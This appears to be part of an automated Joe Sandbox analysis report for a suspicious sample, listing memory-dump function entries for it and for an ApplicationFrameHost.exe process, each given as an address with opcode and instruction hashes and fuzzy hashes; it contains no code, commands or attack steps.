Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1128590d82b74806e0ec032d1fed31763deb49c8fe111d46eccee7ebdb6dfdd8
Instruction ID: 4343aca862fb8802475edf4a2e055ff8180ed4e0da52549c1c02afb755709021
Opcode Fuzzy Hash: 1128590d82b74806e0ec032d1fed31763deb49c8fe111d46eccee7ebdb6dfdd8
Instruction Fuzzy Hash: 1701783485D64E8FE796BBA484886B9BBE0FF5A341F5505B7D808C60A2EB38E0448724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F02ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10564b8e22ebb870cfadc70617f8e9e959c06c375ea8a9d4317a799e3700e97
Instruction ID: c8d3a6b1b6377440c19ef5d0f4f716a7b20d9bc5d23369d3a20ae8b908d2bc6a
Opcode Fuzzy Hash: d10564b8e22ebb870cfadc70617f8e9e959c06c375ea8a9d4317a799e3700e97
Instruction Fuzzy Hash: 4B017C3191D6899FE743BB7488592A97BE0EF5A381F0608F7D408CB1E6EB38A4448721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F01BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0df9e2116a29f92885eb04c085d512f285c6186bacfe6a98a7870f6b1fb5c65
Instruction ID: f35529d743e9b07e1397ff58c03db141b4b62a39e8f99100c37fa18a26d5edd3
Opcode Fuzzy Hash: d0df9e2116a29f92885eb04c085d512f285c6186bacfe6a98a7870f6b1fb5c65
Instruction Fuzzy Hash: A501AD3080D68E8FEB99EF2484552B97BA0FF56301F4401BED808C31D2EB35D490CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F00610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759d0db987236586f5dffb8cca63f6acebf3c06919305d69134b26dff289171f
Instruction ID: 5dbb638afd419787e658ad2887b1e29e76163ddda598fec9abb9b91222ca3428
Opcode Fuzzy Hash: 759d0db987236586f5dffb8cca63f6acebf3c06919305d69134b26dff289171f
Instruction Fuzzy Hash: 37016D3091890D9FEB5AEB6484592B9B7E0FF19345F60087ED40EC21D1EF35A554C624

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F00608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4b1be65a51eda3efc6b7f77b495e6adbc6ba183de12c70aae8f8180a2abc7b
Instruction ID: 315af642922b99319330f61e263659d8ef393acbdc9569d996c65de77ed8520f
Opcode Fuzzy Hash: 7f4b1be65a51eda3efc6b7f77b495e6adbc6ba183de12c70aae8f8180a2abc7b
Instruction Fuzzy Hash: A801693091860E9EEB5AFBA484586BEB6A1FF19345F50087EE80EC21D2EF35A590C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F005D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74ceebf740ad111fc24ad14ddb611a8ef3de65bae00f123e0776ac51243fa7d
Instruction ID: 18c71dbea34d94d9e9e79692d0e1ccaf321d402358f23c26a64032c6c1ecf93b
Opcode Fuzzy Hash: d74ceebf740ad111fc24ad14ddb611a8ef3de65bae00f123e0776ac51243fa7d
Instruction Fuzzy Hash: 2DF0C23080E64E8FEB45EF2494052FA77A4FF16349F50453AE80DC21C1EB35E4A0CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F011A0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b959f7b9da0d1b182778f22ab37596168271d165471a22fa848838921a46c20e
Instruction ID: ed4c97477fca055c0cf3caf7d0136c06f521db44790a8c7bf246e673b3510ed3
Opcode Fuzzy Hash: b959f7b9da0d1b182778f22ab37596168271d165471a22fa848838921a46c20e
Instruction Fuzzy Hash: 07F0C270D1CA4E8EEB59BF6498183FA77E8FF56345F40043AD41AC20C1FF3815948644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F02759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77bb6f39e6b5171fbad5be52dcf4848e7b4008634747a9faef96a5c76d5ae313
Instruction ID: 6e18041d81bf7d6078b8ae2d8427ab5889123e815167256bb9f4194a870bf10b
Opcode Fuzzy Hash: 77bb6f39e6b5171fbad5be52dcf4848e7b4008634747a9faef96a5c76d5ae313
Instruction Fuzzy Hash: 39F0623180E78A8FEB5BAF7488592A93B61FF17301F4505BAD809C61D3EB38A454C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F027CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e794c109912c5ca37dbabd1721f9204990934895b900f1ae280c0b0f624b3a
Instruction ID: e98b206155168c2eb7367afb60d88e75649c71544ab1477584b3ad88a0c86e5d
Opcode Fuzzy Hash: 49e794c109912c5ca37dbabd1721f9204990934895b900f1ae280c0b0f624b3a
Instruction Fuzzy Hash: 4EF0243080E78D8FEB5AAF2488191B97BE0FF06300F4004BFD809C20D2EB389454C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F01710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 8d5ed3cc5c80b70128f052227e211967776a542625b2aadbef637d8143d1c1a6
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 43E06D30E0D8028EEA647B188484674A1D19F46385FB88274F01CCB3E2FB2CECC2C208

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F051AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 8ad868a05ff1d972d703e1d92e83ae35ff065a8a7c6c8d3278e16c1d9ca2f424
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: 11E02670D19A1D8EEBB4EB088C54BB9B6B1BB59642F5000EAC00DE2281EE342A809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F00FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2076799592.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff848f00000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc11496455d78b8b5bd83dee6c28057b1251c60ada5bdc6d7114fe07d5aee4aa
Instruction ID: cccec32d5aac56a3b01fe13bd122b65c2aa175d22c567864ea2199345367a9c4
Opcode Fuzzy Hash: cc11496455d78b8b5bd83dee6c28057b1251c60ada5bdc6d7114fe07d5aee4aa
Instruction Fuzzy Hash: CBE0EC30D1A5198EE750FB14C800BAEAAB1FF44344F5001B5D00DA32C2DF386D408F54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ApplicationFrameHost.exePID: 3808, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F4139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F41602
/, xrefs: 00007FF848F41870
., xrefs: 00007FF848F415CA

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: e1fee8d76af898af57d7c36ff158311bf5a32696db9e24baec28a4c155df8e17
Instruction ID: d20b68190d05786f384708c74054122d3ee0eac61eb1bfa75cf0c527d2dc2947
Opcode Fuzzy Hash: e1fee8d76af898af57d7c36ff158311bf5a32696db9e24baec28a4c155df8e17
Instruction Fuzzy Hash: 3231D530D186698EEBA8EF54C8947EDB3B1FF64741F1045AAC41DA6291CB745984CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3D9C9 Relevance: 2.9, Strings: 2, Instructions: 397COMMON

Download Yara Rule

Strings

p\H, xrefs: 00007FF848F3DAE2
NH, xrefs: 00007FF848F3DA74

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: 50a64f757ddc55a4b50ebc732363cb827bba9f5d45079603488326872c1bc4fc
Instruction ID: fb8c209486843492fecfe0f2fc7d3dec12f050e9b14b6bb284ffafe85aff6a02
Opcode Fuzzy Hash: 50a64f757ddc55a4b50ebc732363cb827bba9f5d45079603488326872c1bc4fc
Instruction Fuzzy Hash: 50E12871D19A5ADFEB98EB68C4957B8B7B1FF58341F0401BAD00ED3292CB386885CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32085 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F3210B

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 5cad21f80d0dac11633abbb85fce36c569c23219bdf4736d47ff924a38e89ad6
Instruction ID: 6bc86265978726e3b6947b6d9def7df545e63514c7b62baf8bd8038eba19fa34
Opcode Fuzzy Hash: 5cad21f80d0dac11633abbb85fce36c569c23219bdf4736d47ff924a38e89ad6
Instruction Fuzzy Hash: 6D411231A0DA4A4FE346FB7898451B8BBE1EF85391F0544BBD40DC71E2EF38A8458355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: dfb6a84b66c1f37ea189c83551a2adf3843acfe27dd303c799642c132058525e
Instruction ID: 19b9c45438e92e0eea30f9a2722d6d63100efde81156394bf5d27c0d595d7ad9
Opcode Fuzzy Hash: dfb6a84b66c1f37ea189c83551a2adf3843acfe27dd303c799642c132058525e
Instruction Fuzzy Hash: C1116A31D0954E9FEB80FB68D8492BE7BE0FF98390F4005B7D809C6192EF38A5448700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F311FD

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 41914be16aecf2e6f3958c4e0cccf7830c30f66a2994a49ec7e494bdda2cd425
Instruction ID: ed51e1004c1d5ef38c981e0f173e24710c06b8e9206562c8baa798964437d6eb
Opcode Fuzzy Hash: 41914be16aecf2e6f3958c4e0cccf7830c30f66a2994a49ec7e494bdda2cd425
Instruction Fuzzy Hash: 8811BF70D0C64A8FEB5AFB6488692F97BE0FF59341F1404BFD40AD61D1EB285580C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F311A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F311FD

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9619e6b3be7d06d8e08f29bb2ed19894469f09d1310db910c94a0a2bb3345006
Instruction ID: d24fa57917b696d3540fadcb2b8ae9104da35ce644bd11b784db3c43e7b21b37
Opcode Fuzzy Hash: 9619e6b3be7d06d8e08f29bb2ed19894469f09d1310db910c94a0a2bb3345006
Instruction Fuzzy Hash: 3BF0F070E1CA4E8EFB99BBA498193FA7BE8FF55345F00147BE41AD20C0EF3856948654

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F432E4 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fb53dd62750110cc97381ac8dc27206d5bb4ec119d9f30c7dd63f2248f54ad
Instruction ID: 3dfc05b0e342b04c1af1738b6403c997aa58215a3c25ec63391746bc75d9a788
Opcode Fuzzy Hash: f1fb53dd62750110cc97381ac8dc27206d5bb4ec119d9f30c7dd63f2248f54ad
Instruction Fuzzy Hash: E8018F3190E2CA8EE752AB3848566B97FB0EF22740F0804F7D448D70D3EA2869488356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4382F Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f0d1c843c963c97d395748c85f02bb79e0644f65f932c0ba11b5f215b6938e
Instruction ID: ac85fa4fb32c374426643637067720682d3fc9c03e3befc796f6cde8c74eb847
Opcode Fuzzy Hash: 02f0d1c843c963c97d395748c85f02bb79e0644f65f932c0ba11b5f215b6938e
Instruction Fuzzy Hash: ED91382771D42299D701BBBCF8565FA7BA0FF913B5F040537C188CD093DA28608AC7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F316A8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b6f37d601e0b8fa826dcbbdaa0732e42646182229add44b9452086f680fcb7
Instruction ID: 4f83665cb12cabb94c0d36a1d8353e444b12f8179f5c41426c50eccbd4eb6dd3
Opcode Fuzzy Hash: 44b6f37d601e0b8fa826dcbbdaa0732e42646182229add44b9452086f680fcb7
Instruction Fuzzy Hash: BE91BD31A0CA4A8FDB58EF1898515B977E2FF99744F14057AE44DC32C2CE34AC82C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42A87 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3acc5847da1adafab5543892d0c12eb5a37affce6332b266c9689c36fd65e1c8
Instruction ID: 665e06d8f8019739f193d77a04f68f16a304f49c4ca3fba3aafe83a2fbcf6cb4
Opcode Fuzzy Hash: 3acc5847da1adafab5543892d0c12eb5a37affce6332b266c9689c36fd65e1c8
Instruction Fuzzy Hash: 1291A270D1861D8EEBA4EB98C855BEDBBB1FF58340F1041BAD40DE3292DF3469858B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F335FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c41778142b2e369fc7338560081fed507dbe4c79e10ffb0320101b127e3c46
Instruction ID: c77a72111f36bc1c676fe2a36a3b63fe239c306d636ccccb3e3ae7339127cee8
Opcode Fuzzy Hash: 75c41778142b2e369fc7338560081fed507dbe4c79e10ffb0320101b127e3c46
Instruction Fuzzy Hash: 1B719031E1894A8FE794EB6CE8157AABBF1FB9A350F90017AC00DD32C6DFA819058751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25fe15faa6340078e3760e6cbb6726dfe9bfe84c883f65ab69ded85f420ab9d
Instruction ID: fe5f088bfad6febefadc2c0ab73c48d136d8e29db0134a4ec53058856fafb5a5
Opcode Fuzzy Hash: d25fe15faa6340078e3760e6cbb6726dfe9bfe84c883f65ab69ded85f420ab9d
Instruction Fuzzy Hash: 7551BF31A0CA898FDB48EF1888545BA77E2FB99754F14057EE44AC32C1CF35E882C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30CA0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39065b78f8d35f050d9570f9eb88840390255c7c024f0cb92b5a89e63413fc6d
Instruction ID: 8c6156fd971b2e33896348c0986b7a570aae0bbdc188d4d5dcc6c746b1861d31
Opcode Fuzzy Hash: 39065b78f8d35f050d9570f9eb88840390255c7c024f0cb92b5a89e63413fc6d
Instruction Fuzzy Hash: B061BE71D0DA0A8FE799FB28845ABADB7A1FF94340F4042BBC40DA71D2DF3869458B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3C920 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23337ab21c23dea3de692e0f83cd93e3182a864f9e5ab1433e8a09fbd5f1df45
Instruction ID: 9ab5152222ba13c21a0bae10455969f1a1566cda315444638ce63075bad4968b
Opcode Fuzzy Hash: 23337ab21c23dea3de692e0f83cd93e3182a864f9e5ab1433e8a09fbd5f1df45
Instruction Fuzzy Hash: 8451D433A1D51A9EEB84BBACB4550FD7B60EF903B5F040277D10CC90C3EF28645586A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3C928 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2171084ad96668d1f0b6396503e01b6c4667a6423e6c34ee02d8df7bfe94087
Instruction ID: e9ee839edc2067722165077818d649886e83b23c636bf5d28f2d2d09d6b01050
Opcode Fuzzy Hash: f2171084ad96668d1f0b6396503e01b6c4667a6423e6c34ee02d8df7bfe94087
Instruction Fuzzy Hash: 1741B433A1E5169EEB84BBACB8450FD7B64EF903B9F044277D50C890C3EF2C245586A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F331C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 632631583b28ac64a08bcd07a87fcd5446b956e47b342a3440680b626d3a7bf6
Instruction ID: dd57ee85346f0a5bf0a89363849f69b4c33b27adf16a4b6a58c925156934d074
Opcode Fuzzy Hash: 632631583b28ac64a08bcd07a87fcd5446b956e47b342a3440680b626d3a7bf6
Instruction Fuzzy Hash: 3C510470D0960D8EEB54EBA8E499AFDBBF1EF48341F50407AD009E72D2DB38A944CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F428DC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa53e6c49d41cd35b868b53c71d60a738c6ed4a40e37257b5945b963a935d0f
Instruction ID: cd7ec8f4e4d5593313f44d6b6ab2e922f4d0f12d5bfb7400ae598f65aa8ba6b5
Opcode Fuzzy Hash: 2aa53e6c49d41cd35b868b53c71d60a738c6ed4a40e37257b5945b963a935d0f
Instruction Fuzzy Hash: 6041B570D1861D8FEB94EB58D895BA8BBB1FF59340F4041AAD40DE3292DF346984DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4267D Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 780f1caecac6277d04160065f0b1f7bd74f9652648abf1c6b168115180b6a571
Instruction ID: 9e609bce062c6d979b7d10b2f5ae986c8b88987394d527a9658b5b4e897930ce
Opcode Fuzzy Hash: 780f1caecac6277d04160065f0b1f7bd74f9652648abf1c6b168115180b6a571
Instruction Fuzzy Hash: 46415D30E2965D9FEB44EB98D855AEEB7B1FF58301F10017AE009E3292DF386841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3C2CA Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1971a53dc1054c47674d9fe8b384041fccb36b3bae783d5afa8096331fc30315
Instruction ID: 918e637004668a8f6c0d0d13f223b0f9ec6a478efc22c2cfa15d3a185ba1ac3d
Opcode Fuzzy Hash: 1971a53dc1054c47674d9fe8b384041fccb36b3bae783d5afa8096331fc30315
Instruction Fuzzy Hash: 4F31C535E1C91D8EEB94FBA8D895ABCB7B5FF58340F50116AD00DE3282DF2468929B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BD69 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1826b8985eb4e12e2f0afae223e43d77e74fbe1ee4b72d531a76ff89c70e7e77
Instruction ID: 8341fa3d257dc99def31bb352a3f3fec4b9f76a7b25745749cacb731b5f92fef
Opcode Fuzzy Hash: 1826b8985eb4e12e2f0afae223e43d77e74fbe1ee4b72d531a76ff89c70e7e77
Instruction Fuzzy Hash: 66314570D1D6498FDB54EFA8C8A46EDBBF1EF19300F14017AD009E7291DB38A980CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3AE88 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a362182557b72730a6e1f2f058bb61253cdf5d8cf8f8db1acb524ea8d764cb9
Instruction ID: 0e60526c69a66c8210e3e3c483e5c82b9e164374cfbc685e6145432b1a7ebc80
Opcode Fuzzy Hash: 8a362182557b72730a6e1f2f058bb61253cdf5d8cf8f8db1acb524ea8d764cb9
Instruction Fuzzy Hash: 2331CD72D0DA8B8FE701AB7988191F97BE0FF15380F0804BBC459C71D2EF28A9948355

Uniqueness

Uniqueness Score: -1.00%

